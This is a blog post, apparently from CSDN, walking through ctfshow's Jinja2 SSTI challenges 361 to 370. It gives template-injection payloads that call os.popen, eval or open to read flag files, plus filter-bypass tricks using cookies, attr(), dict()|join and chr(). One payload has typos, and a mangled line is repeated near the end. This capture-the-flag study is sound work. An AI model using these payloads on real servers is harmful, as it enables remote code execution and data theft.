ctfshow--SSTI

最新推荐文章于 2024-06-05 19:48:10 发布
最新推荐文章于 2024-06-05 19:48:10 发布
阅读量589 收藏
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51684648/article/details/123501953
版权

ctfshow–SSTI

361、

{{7*‘7’}}回显是7777777,判断是jinjia2模板。

{{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}}

''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。

362、

__builtin__中有众多的可用函数,包括eval

1:
?name={{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}
2:
?name={{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}
x.__init.globals也可以找到__builtins__  x是任意英文字母组合
3:
?name={% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__ == '_wrap_close' %}{% print i.__init__.__globals__['popen']('ls').read() %}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

这种利用{{%%}}逻辑语句进行遍历,寻找os._wrap_close的这个类,此类中有popen函数

363、(过滤了单双引号)

使用requests.args.x1传递GET参数x1,从而避免单双引号的使用

?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /f*').read()

还可以用open函数直接打开

?name={{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[request.args.arg1](request.args.arg2).read()}}&arg1=open&arg2=/flag

popen函数

?name={{().__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[request.args.x1](request.args.x2).read()}}&x1=popen&x2=cat+/f*

364、

过滤了args,使用cookies替代就可以

image-20220220211102651

365、

增加过滤了[]

可以用__getitem__用来获取序号

"".__class__.__mro__[2]
"".__class__.__mro__.__getitem__(2)

?name={{x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}
cookie传参:x1=__builtins__;x2=__import__('os').popen('cat /f*').read()

366、

过滤了_(下划线),可以用attr()+requests.args.x构造

attr():attr用于获取变量
(过滤器与变量之间用管道符(|)隔开,阔哈中可以有可选参数。可以链接多个过滤器。一个过滤器的输出应用于下一个过滤器)
	""|attr("__class__")
	相当于
	"".__class__

?name={{(x|attr(request.cookies.x3)|attr(request.cookies.x4)|attr(request.cookies.x5))(request.cookies.x1).eval(request.cookies.x2)}}
cookie:x3=__init__;x4=__globals__;x5=__getitem__;x1=__builtins__;x2=__import__('os').popen('cat /f*').read()

367,同上

368、

过滤了{{,使用{%%}绕过

?name={% print(x|attr(request.cookies.x3)|attr(request.cookies.x4)|attr(request.cookies.x5))(request.cookies.x1).eval(request.cookies.x2)%}
cookie:x3=__init__;x4=__globals__;x5=__getitem__;x1=__builtins__;x2=__import__('os').popen('cat /f*').read()

369、

?name=
{% set po=dict(po=a,p=a)|join%} #dict()|join 拼接名的方式,此处得到变量po=pop
{% set a=(()|select|string|list)|attr(po)(24)%} #通过pop(24)选择到"_"下划线,并赋给a
{% set ini=(a,a,dict(init=a)|join,a,a)|join() %} #ini=__init__
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set grti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} #x=q.__init__.__globals__.__getitem__('__builtins__')
{% set chr=x.chr %}
{% set file=chr(47)%2dchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}  #file=/ flag
{% print(x.open(file).read())%}

?name={% set po=dict(po=a,p=a) | join%} 
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join() %}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr %}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{% print(x.open(file).read())%}

?name=
{% set a=(()|select|string|list).pop(24) %}
{% set globals=(a,a,dict(globals=1)|join,a,a)|join %}
{% set init=(a,a,dict(init=1)|join,a,a)|join %}
{% set builtins=(a,a,dict(builtins=1)|join,a,a)|join %}
{% set a=(lipsum|attr(globals)).get(builtins) %}
{% set chr=a.chr %}
{% print a.open(chr(47)~chr(102)~chr(108)~chr(97)~chr(103)).read() %}

思路是利用dict()|join拼接我们需要的字符串

370、

过滤了0-9

?name=
{% set two=(dict(aa=a)|join|count)%} #用这种方法表示数字
{% set three=(dict(aaa=a)|join|count)%}
{% set four=(dict(aaaa=a)|join|count)%}
{% set seven=(dict(aaaaaaa=a)|join|count)%}
{% set eight=(dict(aaaaaaaa=a)|join|count)%}
{% set nine=(dict(aaaaaaaaa=a)|join|count)%}
{% set ten=(dict(aaaaaaaaaa=a)|join|count)%}
{% set twofour=( two~four)|int%}
{% set a=(()|select|string|list).pop(twofour)%}
{% set globals=(a,a,dict(globals=s)|join,a,a)|join%}
{% set init=(a,a,dict(init=v)|join,a,a)|join%}
{% set builtins=(a,a,dict(builtins=c)|join,a,a)|join%}
{% set a=(lipsum|attr(globals)).get(builtins)%}
{% set chr=a.chr%}
{% print a.open(chr((four~seven)|int)~chr((ten~two)|int)~chr((ten~eight)|int)~chr((nine~seven)|int)~chr((ten~three)|int)).read()%}

371、372没看懂怎么构造反弹shell的,过段时间再看。

int a.open(chr((fourseven)|int)chr((tentwo)|int)chr((teneight)|int)chr((nineseven)|int)chr((ten~three)|int)).read()%}


371、372没看懂怎么构造反弹shell的,过段时间再看。
YI_an#
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
ctfshow-ssti
weixin_74660472的博客
04-18 337
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFSHOW-SSTI
Monica的博客
11-12 4819
参考文章 SSTI模板注入绕过(进阶篇)_羽的博客-CSDN博客_ssti绕过
CTFSHOW--SSTI字符串拼接绕过
最新发布
qq_75120258的博客
06-05 845
打开环境查看日志文件得到日志文件在UA头里写下一句话木马然后再发送,因为我传了很多次的一句话木马,所以添加了很多条日志信息进行POST传参。
SSTI模板注入-args、单双引号被过滤绕过(ctfshow web入门364)
T1ngSh0w的博客
03-18 236
当单双引号被过滤时,我们使用()或者[]来获得我们所需要的类,并且我们是尝试使用传参的方式将我们的shell命令传进去执行,但是当args也被过滤的时候,我们就不能使用request.args.参数名 来进行传参了。我这里的绕过方法有两种,一种是我们获得chr()这个python的内置函数,chr(ascii值)函数接收一个字符的ascii码值然后将该ascii码值所对应的字符返回,这时我们就可以使用chr(ascii值)得到我们想要的字符,然后将其进行拼接成我们想要的字符串或者shell命令。
ctfshow SSTI
m0_74940843的博客
11-08 59
GET输入?说明注入点是?name获得内置类所对应的类获得object基类获得所有子类我们用python脚本观察是否含有’popen’列出根目录内容取得flag。
ctfshow web入门 SSTI
2301_79442654的博客
03-16 193
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
nti2021-happyfarm
04-14
NTI CD关于信息安全的团队阶段。 工程挑战。... 在POST title参数(大概是Jinja2)中发现的SSTI一些关键字正在被过滤,而不一定是有效负载的一部分(例如config ) 此外,我们在以下方面收到了SSTI
ctfshow---web入门---SSTI(361-368)
2301_80470992的博客
03-16 452
根据题目给的“名字就是考点”,所以构建playloadstrstrobjectobjectobject[132].__init____init__['popen']popenos.popen。
CTFSHOW 愚人杯easy_ssti
SanKobe的博客
05-25 308
另外这道题刚开始的源码那块对"f"和"ge"进行了处理,我不知道在其他思路里会不会卡住,我试了下可以在语句的最后直接加上"ge"绕过。在页面上查catch_warning的位置,再查class的位置就能大概查到是第几个类了。是flask的模板,分析一下源码应该就是在/hello目录下有SSTI注入的漏洞。用ls查了一下当前目录,app.py 里也没啥有用信息,和压缩包里是一样的。进入hello目录下并照常走一下判断流程,发现应该是jinja2的模板。猜测了一下,应该是将语句中的"/"当成目录了。
CTFSHOW SSTI入门
v2ish1yan的博客
09-02 589
ssti入门题
CTFSHOW SSTI篇
羽的博客
01-08 5897
文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 699
SSTI原理以及ctf.show的SSTI(web361-web362)
UNCTF2020web方向部分题解
bmth666的博客
11-18 1656
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的题目的一些思路:checkin-sql:easyphp: Web方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行任意代码或获取敏感信息。 在CTF(Capture The Flag)比赛中,SSTI是一类常见的漏洞类型。攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的过滤器或转义函数。此外,安全审计和代码审查也是发现和修复SSTI漏洞的重要步骤。 如果你对SSTI漏洞有更具体的问题或需要进一步的解释,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值